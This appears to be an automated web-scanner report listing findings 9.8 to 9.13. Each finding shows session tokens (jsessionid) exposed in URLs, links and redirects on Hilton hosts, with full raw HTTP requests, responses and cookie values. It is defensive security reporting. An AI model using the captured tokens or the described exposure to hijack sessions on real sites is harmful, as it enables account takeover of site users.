       <li><a href="http://hhonors1.hilton.com/en_US/hh/sitemap.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" title="Site Map">Site Map</a>
...[SNIP]...
<li><a href="http://hhonors1.hilton.com/en_US/hh/terms.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" title="Terms and Conditions">Terms &amp; Conditions</a>
...[SNIP]...
<li><a href="http://hhonors1.hilton.com/en_US/hh/partners/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" title="Partners Terms &amp; Conditions">Partners Terms &amp; Conditions</a>
...[SNIP]...
<li><a class="linkPrivacyPolicy" href="http://hhonors1.hilton.com/en_US/ww/customersupport/privacy-policy.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" title="Privacy Policy (Updated Sep 2011)" target="_blank">Privacy Policy (Updated Sep 2011)</a>
...[SNIP]...

9.8. https://secure.hilton.com/en/hi/login/login.jhtml

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.hilton.com
Path:   /en/hi/login/login.jhtml

Issue detail

The URL in the request below appears to contain a session token within the query string.

Request

GET /en/hi/login/login.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ?_requestid=21183 HTTP/1.1
Host: secure.hilton.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hilton.com/en/hi/info/site_usage.jhtml
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; cross-sell=hi; ClrCSTO=T; ClrSSID=1317646383790-9086; mmcore.tst=0.391; mmid=315413507%7CCgAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=315413507%7CCgAAAAodekFwyAYAAA%3D%3D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635914358:ss=1317635584777; JSESSIONID=S2VXAICTPUQJWCSGBIYMVCQ

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml", CP="NOI DSP DEVa TAIa OUR BUS UNI"
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
Content-Length: 33818
Date: Mon, 03 Oct 2011 12:58:38 GMT
Connection: keep-alive


<!--suppress top nav sign in widget -->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


    <HTML>
<HEAD>

           <TITLE>Login Page</TITLE>
           
           
           <LINK re
...[SNIP]...

9.9. https://secure.hilton.com/en/hi/login/login.jhtml

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.hilton.com
Path:   /en/hi/login/login.jhtml

Issue detail

The response below contains links that appear to contain session tokens (see the href attributes in the response excerpt).

Request

GET /en/hi/login/login.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ?_requestid=21183 HTTP/1.1
Host: secure.hilton.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hilton.com/en/hi/info/site_usage.jhtml
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; cross-sell=hi; ClrCSTO=T; ClrSSID=1317646383790-9086; mmcore.tst=0.391; mmid=315413507%7CCgAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=315413507%7CCgAAAAodekFwyAYAAA%3D%3D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635914358:ss=1317635584777; JSESSIONID=S2VXAICTPUQJWCSGBIYMVCQ

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml", CP="NOI DSP DEVa TAIa OUR BUS UNI"
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
Content-Length: 33818
Date: Mon, 03 Oct 2011 12:58:38 GMT
Connection: keep-alive


<!--suppress top nav sign in widget -->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


    <HTML>
<HEAD>

           <TITLE>Login Page</TITLE>
           
           
           <LINK re
...[SNIP]...
<td><a href="http://www1.hilton.com/en_US/hi/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" title="Go to home page" tabindex="3" class="OneLinkKeepLinks"><img src="/en/hi/media/images/logos/hdr_logo.gif" alt="Hilton Hotels" border="0">
...[SNIP]...
<li id="navmain01" title="Specials &amp; Packages"><a href="https://secure.hilton.com/en/hi/promotions/index.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">Specials & Packages</a>
...[SNIP]...
<li id="navmain03" title="Meetings"><a href="https://secure.hilton.com/en/hi/groups/index.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ?eventType=Business">Meetings</a>
...[SNIP]...
<li id="navmain0302" title="Social Gatherings"><a href="https://secure.hilton.com/en/hi/groups/index.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ?eventType=Social&it=Tnav,GM">Social Gatherings</a>
...[SNIP]...
<li id="navmain05" title="Travel Guides"><a href="https://secure.hilton.com/en/hi/ctg/index.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">Travel Guides</a>
...[SNIP]...
<li id="navmain07" title="My Favorite Hotels"><a href="https://secure.hilton.com/en/hi/cart/index.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">My Favorite Hotels</a>
...[SNIP]...
<li class="brandBarLi brandBarLi_CH" id="brandBarLi_CH"><a class="brandBarLiA" href="http://www1.hilton.com/en/ch/home.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_CH');" onmouseout="turnOffPopup('brandBarLi_CH');"></a>
...[SNIP]...
<li class="brandBarLi brandBarLi_HI" id="brandBarLi_HI"><a class="brandBarLiA" href="http://www1.hilton.com/en_US/hi/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_HI');" onmouseout="turnOffPopup('brandBarLi_HI');"></a>
...[SNIP]...
<li class="brandBarLi brandBarLi_DT" id="brandBarLi_DT"><a class="brandBarLiA" href="http://www1.hilton.com/en_US/dt/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_DT');" onmouseout="turnOffPopup('brandBarLi_DT');"></a>
...[SNIP]...
<li class="brandBarLi brandBarLi_ES" id="brandBarLi_ES"><a class="brandBarLiA" href="http://www1.hilton.com/en_US/es/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_ES');" onmouseout="turnOffPopup('brandBarLi_ES');"></a>
...[SNIP]...
<li class="brandBarLi brandBarLi_GI" id="brandBarLi_GI"><a class="brandBarLiA" href="http://www1.hilton.com/en_US/gi/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_GI');" onmouseout="turnOffPopup('brandBarLi_GI');"></a>
...[SNIP]...
<li class="brandBarLi brandBarLi_HP" id="brandBarLi_HP"><a class="brandBarLiA" href="http://www1.hilton.com/en_US/hp/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_HP');" onmouseout="turnOffPopup('brandBarLi_HP');"></a>
...[SNIP]...
<li class="brandBarLi brandBarLi_HW" id="brandBarLi_HW"><a class="brandBarLiA" href="http://www1.hilton.com/en_US/hw/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_HW');" onmouseout="turnOffPopup('brandBarLi_HW');"></a>
...[SNIP]...
<li class="brandBarLi brandBarLi_HT" id="brandBarLi_HT"><a class="brandBarLiA" href="http://www1.hilton.com/en_US/ht/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_HT');" onmouseout="turnOffPopup('brandBarLi_HT');"></a>
...[SNIP]...
<li class="brandBarLi brandBarLi_WW" id="brandBarLi_WW"><a class="brandBarLiA" href="http://www1.hilton.com/en_US/hh/home_index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ"></a>
...[SNIP]...
<li>
                                           <a href="http://www1.hilton.com/en_US/hi/sitemap/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">Site Map</a>
...[SNIP]...
<li>
                                           <a href="http://www1.hilton.com/en_US/hi/customersupport/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" rel="nofollow">Customer Support</a>
...[SNIP]...
<li>
                                       <a href="http://www1.hilton.com/en_US/ww/customersupport/privacy-policy.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" target="_blank" rel="nofollow" class="linkPrivacyPolicy">Privacy Policy (Updated Sep 2011)</a>
...[SNIP]...
<li>
                                       <a href="http://www1.hilton.com/en_US/hi/customersupport/site-usage.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" rel="nofollow">Site Usage Agreement</a>
...[SNIP]...
<li><a href="http://www1.hilton.com/es/hi/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">Español</a>
...[SNIP]...
<li><a href="http://www1.hilton.com/fr/hi/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">Français</a>
...[SNIP]...
<li><a href="http://www.hilton.co.jp/SiteHomePage;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">Japan</a>
...[SNIP]...

9.10. https://secure.hilton.com/en/hi/mytravelplanner/my_account.jhtml

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.hilton.com
Path:   /en/hi/mytravelplanner/my_account.jhtml

Issue detail

The URL in the request carries the session token as a path parameter (;jsessionid=...) rather than in the query string. The exposure is the same either way: the token lands in browser history, proxy and web-server logs, and in the Referer header of any off-site link followed from the page. Note also that the Origin and Referer here are plain http://www.hilton.com, so the same token is being used across the cleartext and TLS hosts:

Request

POST /en/hi/mytravelplanner/my_account.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ?_DARGS=/en/crm/login/widget_homepage.jhtml.8 HTTP/1.1
Host: secure.hilton.com
Connection: keep-alive
Content-Length: 798
Cache-Control: max-age=0
Origin: http://www.hilton.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hilton.com/en/hi/info/site_usage.jhtml
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; cross-sell=hi; ClrCSTO=T; ClrSSID=1317646383790-9086; mmcore.tst=0.391; mmid=315413507%7CCgAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=315413507%7CCgAAAAodekFwyAYAAA%3D%3D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635914358:ss=1317635584777

%2Fcom%2Fhilton%2Fcrm%2Fclient%2Fhandler%2FLoginFormHandler.failureURL=%2Fen%2Fhi%2Flogin%2Flogin.jhtml&_D%3A%2Fcom%2Fhilton%2Fcrm%2Fclient%2Fhandler%2FLoginFormHandler.failureURL=+&%2Fcom%2Fhilton%2F
...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Server: Netscape-Enterprise/6.0
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml", CP="NOI DSP DEVa TAIa OUR BUS UNI"
Location: /en/hi/login/login.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ?_requestid=21190
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:58:36 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Content-Length: 49638

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>



...[SNIP]...

9.11. https://secure.hilton.com/en/hi/mytravelplanner/my_account.jhtml

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.hilton.com
Path:   /en/hi/mytravelplanner/my_account.jhtml

Issue detail

The response contains the following links, each of which embeds the session token as a ;jsessionid= path parameter (servlet URL rewriting). The 302 Location header carries it too, and the rewritten links span several hosts (secure.hilton.com, www1.hilton.com, hhonors1.hilton.com, www.hilton.co.jp), so every navigation re-exposes the token in a new Referer:

Request

POST /en/hi/mytravelplanner/my_account.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ?_DARGS=/en/crm/login/widget_homepage.jhtml.8 HTTP/1.1
Host: secure.hilton.com
Connection: keep-alive
Content-Length: 798
Cache-Control: max-age=0
Origin: http://www.hilton.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hilton.com/en/hi/info/site_usage.jhtml
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; cross-sell=hi; ClrCSTO=T; ClrSSID=1317646383790-9086; mmcore.tst=0.391; mmid=315413507%7CCgAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; mmcore.pd=315413507%7CCgAAAAodekFwyAYAAA%3D%3D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635914358:ss=1317635584777

%2Fcom%2Fhilton%2Fcrm%2Fclient%2Fhandler%2FLoginFormHandler.failureURL=%2Fen%2Fhi%2Flogin%2Flogin.jhtml&_D%3A%2Fcom%2Fhilton%2Fcrm%2Fclient%2Fhandler%2FLoginFormHandler.failureURL=+&%2Fcom%2Fhilton%2F
...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Server: Netscape-Enterprise/6.0
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml", CP="NOI DSP DEVa TAIa OUR BUS UNI"
Location: /en/hi/login/login.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ?_requestid=21190
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:58:36 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Content-Length: 49638

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD>
<H1>302 Moved Temporarily</H1><BODY>
</BODY>



...[SNIP]...
<td><a href="http://www1.hilton.com/en_US/hi/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" title="Go to home page" tabindex="3" class="OneLinkKeepLinks"><img src="/en/hi/media/images/logos/hdr_logo.gif" alt="Hilton Hotels" border="0">
...[SNIP]...
<br>
                           
                   <a href="https://secure.hilton.com/en/hi/help/sign_in_help.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" rel="nofollow">Forgot password?</a>
...[SNIP]...
<li id="navmain01" title="Specials &amp; Packages"><a href="https://secure.hilton.com/en/hi/promotions/index.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">Specials & Packages</a>
...[SNIP]...
<li id="navmain03" title="Meetings"><a href="https://secure.hilton.com/en/hi/groups/index.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ?eventType=Business">Meetings</a>
...[SNIP]...
<li id="navmain0302" title="Social Gatherings"><a href="https://secure.hilton.com/en/hi/groups/index.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ?eventType=Social&it=Tnav,GM">Social Gatherings</a>
...[SNIP]...
<li id="navmain05" title="Travel Guides"><a href="https://secure.hilton.com/en/hi/ctg/index.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">Travel Guides</a>
...[SNIP]...
<li id="navmain07" title="My Favorite Hotels"><a href="https://secure.hilton.com/en/hi/cart/index.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">My Favorite Hotels</a>
...[SNIP]...
<li class="off">
                   <a href="https://secure.hilton.com/en/hi/mytravelplanner/my_reservations.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" class="li-category">My Reservations</a>
...[SNIP]...
<li class="off">
                   <a href="https://secure.hilton.com/en/hi/mytravelplanner/my_stays.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" class="li-category">My Hotel Stays</a>
...[SNIP]...
<li class="off">
                   <a href="https://secure.hilton.com/en/hi/mytravelplanner/my_cancellations.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" class="li-category">My Cancellations</a>
...[SNIP]...
<li class="off">
                           <a href="/en/hi/myprofile/my_profile_account_settings.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" class="li-category">My Profile</a>
...[SNIP]...
<li class="off">
                           <a href="/en/hi/mytravelplanner/hhonors_activity_all.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" class="li-category">HHonors Activity</a>
...[SNIP]...
<li class="off">
                           <a href="/en/hi/mytravelplanner/account_services.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" class="li-category">Member Services</a>
...[SNIP]...
<li class="off">
                           <a href="/en/hi/eevents/index.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" class="li-category" title="Group Booking Tools">e-Events</a>
...[SNIP]...
<li class="off">
                           <a href="/en/hi/mytravelplanner/myway.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" class="li-category">My Way&trade;</a>
...[SNIP]...
<li><a href="/en/hi/myprofile/my_profile_account_settings.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">Update Username or Password</a>
...[SNIP]...
<li><a href="/en/hi/myprofile/my_profile_account_settings.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">Update Email Address</a>
...[SNIP]...
<li><a href="/en/hi/myprofile/my_profile_email_subscribe.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">View Email Subscriptions</a>
...[SNIP]...
<li><a href="/en/hi/myprofile/my_profile_earning_points.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">Edit Preferred Partners</a>
...[SNIP]...
<p>For assistance with a past stay, please email <a href="/en/hi/feedback/guest_assistance.jhtml;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">Guest Assistance</a>
...[SNIP]...
<b>Search and Reservations just got easier!
                   <a href="http://hhonors1.hilton.com/en_US/hh/landing/bookingdemo/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" target="_blank"
                   style="font-weight:bold;">
View demo</a>
...[SNIP]...
<li class="brandBarLi brandBarLi_CH" id="brandBarLi_CH"><a class="brandBarLiA" href="http://www1.hilton.com/en/ch/home.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_CH');" onmouseout="turnOffPopup('brandBarLi_CH');"></a>
...[SNIP]...
<li class="brandBarLi brandBarLi_HI" id="brandBarLi_HI"><a class="brandBarLiA" href="http://www1.hilton.com/en_US/hi/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_HI');" onmouseout="turnOffPopup('brandBarLi_HI');"></a>
...[SNIP]...
<li class="brandBarLi brandBarLi_DT" id="brandBarLi_DT"><a class="brandBarLiA" href="http://www1.hilton.com/en_US/dt/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_DT');" onmouseout="turnOffPopup('brandBarLi_DT');"></a>
...[SNIP]...
<li class="brandBarLi brandBarLi_ES" id="brandBarLi_ES"><a class="brandBarLiA" href="http://www1.hilton.com/en_US/es/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_ES');" onmouseout="turnOffPopup('brandBarLi_ES');"></a>
...[SNIP]...
<li class="brandBarLi brandBarLi_GI" id="brandBarLi_GI"><a class="brandBarLiA" href="http://www1.hilton.com/en_US/gi/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_GI');" onmouseout="turnOffPopup('brandBarLi_GI');"></a>
...[SNIP]...
<li class="brandBarLi brandBarLi_HP" id="brandBarLi_HP"><a class="brandBarLiA" href="http://www1.hilton.com/en_US/hp/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_HP');" onmouseout="turnOffPopup('brandBarLi_HP');"></a>
...[SNIP]...
<li class="brandBarLi brandBarLi_HW" id="brandBarLi_HW"><a class="brandBarLiA" href="http://www1.hilton.com/en_US/hw/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_HW');" onmouseout="turnOffPopup('brandBarLi_HW');"></a>
...[SNIP]...
<li class="brandBarLi brandBarLi_HT" id="brandBarLi_HT"><a class="brandBarLiA" href="http://www1.hilton.com/en_US/ht/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" onmouseover="turnOnPopup('brandBarLi_HT');" onmouseout="turnOffPopup('brandBarLi_HT');"></a>
...[SNIP]...
<li class="brandBarLi brandBarLi_WW" id="brandBarLi_WW"><a class="brandBarLiA" href="http://www1.hilton.com/en_US/hh/home_index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ"></a>
...[SNIP]...
<li>
                                           <a href="http://www1.hilton.com/en_US/hi/sitemap/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">Site Map</a>
...[SNIP]...
<li>
                                           <a href="http://www1.hilton.com/en_US/hi/customersupport/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" rel="nofollow">Customer Support</a>
...[SNIP]...
<li>
                                       <a href="http://www1.hilton.com/en_US/ww/customersupport/privacy-policy.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" target="_blank" rel="nofollow" class="linkPrivacyPolicy">Privacy Policy (Updated Sep 2011)</a>
...[SNIP]...
<li>
                                       <a href="http://www1.hilton.com/en_US/hi/customersupport/site-usage.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ" rel="nofollow">Site Usage Agreement</a>
...[SNIP]...
<li><a href="http://www1.hilton.com/es/hi/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">Español</a>
...[SNIP]...
<li><a href="http://www1.hilton.com/fr/hi/index.do;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">Français</a>
...[SNIP]...
<li><a href="http://www.hilton.co.jp/SiteHomePage;jsessionid=S2VXAICTPUQJWCSGBIYMVCQ">Japan</a>
...[SNIP]...

9.12. https://secure3.hilton.com/en_US/hi/reservation/book.htm

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure3.hilton.com
Path:   /en_US/hi/reservation/book.htm

Issue detail

The response's Location header and the link in its body both embed the session token as a ;jsessionid= path parameter. The body writes the separator as the entity &#59;, which a naive search for the literal string ";jsessionid=" would miss, so decode entities before scanning response bodies for this issue:

Request

GET /en_US/hi/reservation/book.htm;jsessionid=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149?xch=1041790096,4E9B21AE664381D1B53DE8378483FB39.etc13&inputModule=HOTEL&checkInDay=3&checkInMonthYr=October+2011&checkOutDay=4&checkOutMonthYr=October+2011&flexCheckInDay=3&flexCheckInMonthYr=October+2011&los=1&ctyhocn=BOSLHHH&isReward=false&flexibleSearch=false&source=hotelResWidget&pfsLocale=en HTTP/1.1
Host: secure3.hilton.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041789615,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; cross-sell=hi; ClrCSTO=T; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; mmcore.tst=0.825; mmid=347472783%7CAwAAAAodekFwyAYAAA%3D%3D; mmcore.pd=347472783%7CAwAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635647394:ss=1317635584777

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Location: https://secure3.hilton.com/en_US/hi/reservation/book.htm;jsessionid=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149?execution=e2s1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Date: Mon, 03 Oct 2011 12:53:58 GMT
Connection: keep-alive
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: corporateId=; domain=.hilton.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
Content-Length: 521

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://secure3.hilton.com/en_US/hi/reservation/book.htm&#59;jsessionid=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149?execution=e2s1">https://secure3.hilton.com/en_US/hi/reservation/book.htm&#59;jsessionid=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149?execution=e2s1</a>
...[SNIP]...

9.13. https://secure3.hilton.com/en_US/hi/reservation/book.htm

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure3.hilton.com
Path:   /en_US/hi/reservation/book.htm

Issue detail

The URL in the request carries the session token as a ;jsessionid= path parameter rather than in the query string. This request also shows the two hosts exchanging each other's tokens in the clear: the xch query parameter passes the www1.hilton.com JSESSIONID value (4E9B21AE664381D1B53DE8378483FB39.etc13) to secure3.hilton.com, and the Referer shows the www1.hilton.com page that received this host's GWSESSIONID value the same way:

Request

GET /en_US/hi/reservation/book.htm;jsessionid=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149?xch=1041790096,4E9B21AE664381D1B53DE8378483FB39.etc13&inputModule=HOTEL&checkInDay=3&checkInMonthYr=October+2011&checkOutDay=4&checkOutMonthYr=October+2011&flexCheckInDay=3&flexCheckInMonthYr=October+2011&los=1&ctyhocn=BOSLHHH&isReward=false&flexibleSearch=false&source=hotelResWidget&pfsLocale=en HTTP/1.1
Host: secure3.hilton.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/hotel/BOSLHHH/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041789615,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
